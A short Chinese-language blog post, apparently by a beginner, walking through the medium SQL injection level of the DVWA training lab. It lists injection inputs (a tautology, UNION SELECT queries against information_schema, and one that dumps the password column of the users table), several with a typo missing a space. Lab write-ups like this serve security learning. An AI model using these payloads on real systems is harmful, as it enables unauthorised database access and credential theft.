ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

DVWA 的Sql injection 中的medium

DVWA 的Sql injection 中的medium

DVWA 的Sql injection 中的medium参考方法

(初学者,方法不一定对,只是参考,有不对的欢迎评论区指错)

1.是用页面注入完成的 右键Submit,选择Inspect,找到User ID,就可以改参数了

2.恒真条件 1 or 1=1

3.看数据库名 1 union select 1,database()

4.查询语句字段数 1 or 1=1 order by 1#

5.显示表名 1 union select1,group_concat(table_name) from information_schema.tables


6.显示密码 1 union select1,group_concat(password) from users

7.获取表中的字段名 1 union select1,group_concat(column_name) from information_schema.columns

注意:在网页输入的语法和学的不太一样。第一是没有单引号,是因为单引号会被转义。第二是没有where条件,是因为这样可以饶过单引号。

返回列表